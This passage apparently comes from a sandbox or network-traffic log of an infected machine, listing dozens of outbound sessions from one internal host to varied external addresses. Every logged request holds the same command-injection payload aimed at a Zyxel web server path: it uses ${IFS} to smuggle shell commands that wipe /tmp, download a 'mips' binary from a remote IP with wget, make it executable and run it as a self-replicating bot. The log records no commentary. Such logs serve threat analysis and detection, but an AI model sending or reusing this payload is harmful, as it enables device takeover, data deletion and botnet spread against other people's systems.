                        Mar 12, 2024 08:50:26.027297020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        746192.168.2.1458078209.99.20.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027364016 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        747192.168.2.145578631.246.118.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027411938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        748192.168.2.144451845.173.174.15443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027513027 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        749192.168.2.1450988186.124.219.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027573109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        750192.168.2.1442672123.1.37.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027625084 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        751192.168.2.1455900118.71.71.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027651072 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        752192.168.2.1452660218.143.116.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027738094 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        753192.168.2.144935690.80.244.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027782917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        754192.168.2.145263651.57.58.77443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027822971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        755192.168.2.1441904187.136.175.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027864933 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        756192.168.2.144617661.23.252.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027925014 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        757192.168.2.1448652139.69.169.81443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027982950 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        758192.168.2.144995442.163.235.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028026104 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        759192.168.2.1450772213.237.163.57443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028060913 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        760192.168.2.145927451.49.73.44443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028136969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        761192.168.2.144578651.91.30.245443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028196096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        762192.168.2.1453446207.90.130.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028251886 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        763192.168.2.143918440.200.79.1443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028357983 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        764192.168.2.1436134172.207.242.61443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028394938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        765192.168.2.1458268132.249.212.180443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028465033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        766192.168.2.144079692.85.245.221443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028515100 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        767192.168.2.14365945.162.132.144443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028583050 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        768192.168.2.1440336116.224.255.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028629065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        769192.168.2.1442112153.205.190.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028706074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        770192.168.2.144503650.166.40.232443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028758049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        771192.168.2.1447824113.84.199.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028815031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        772192.168.2.1442544109.90.127.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028867960 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        773192.168.2.1436082123.114.252.120443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028928041 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        774192.168.2.1440650157.233.41.128443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.028965950 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        775192.168.2.1459244124.132.198.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029022932 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        776192.168.2.1441322142.226.66.181443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029069901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        777192.168.2.14465709.84.136.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029114962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        778192.168.2.1446162218.136.146.3443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029189110 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        779192.168.2.144755017.75.65.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029239893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        780192.168.2.1436400222.107.244.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029311895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        781192.168.2.1451050103.239.240.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029344082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        782192.168.2.144123639.189.13.117443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029401064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        783192.168.2.1452198155.195.171.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029465914 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        784192.168.2.144583893.192.67.206443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029529095 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        785192.168.2.1436756168.133.20.123443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029589891 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        786192.168.2.143550678.113.54.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029633045 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        787192.168.2.144609268.125.158.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029696941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        788192.168.2.1440408133.153.67.53443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029759884 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        789192.168.2.1438314110.221.184.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029814005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        790192.168.2.144477282.69.50.128443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029865026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        791192.168.2.144074052.211.32.21443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.029932976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        792192.168.2.144170092.96.169.113443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030000925 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        793192.168.2.1443358130.15.121.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030066967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        794192.168.2.1451512210.219.206.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030133963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        795192.168.2.145805832.230.141.96443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030184031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        796192.168.2.1457870158.84.0.211443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030236959 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        797192.168.2.1447424218.147.72.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030306101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        798192.168.2.144971489.107.72.19443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030359030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        799192.168.2.1439102198.125.0.125443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030389071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        800192.168.2.1443652102.0.180.61443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030453920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        801192.168.2.143835089.94.213.91443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030487061 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        802192.168.2.1439056148.32.55.120443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030556917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        803192.168.2.1445830107.48.3.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030607939 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        804192.168.2.145565812.201.150.199443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030689955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        805192.168.2.144289060.184.198.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030735970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        806192.168.2.1449122101.106.180.151443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030812979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        807192.168.2.144999698.177.10.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030857086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        808192.168.2.144152844.217.43.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030929089 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        809192.168.2.143393664.98.101.84443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.030987978 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        810192.168.2.145063012.84.136.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.031054020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        811192.168.2.145024648.63.206.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.031116962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        812192.168.2.1441262203.11.11.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.031161070 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        813192.168.2.145949490.187.45.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.031207085 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        814192.168.2.1442266220.147.152.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.037326097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        815192.168.2.1458876124.147.234.38443
                        TimestampBytes transferredDirectionData
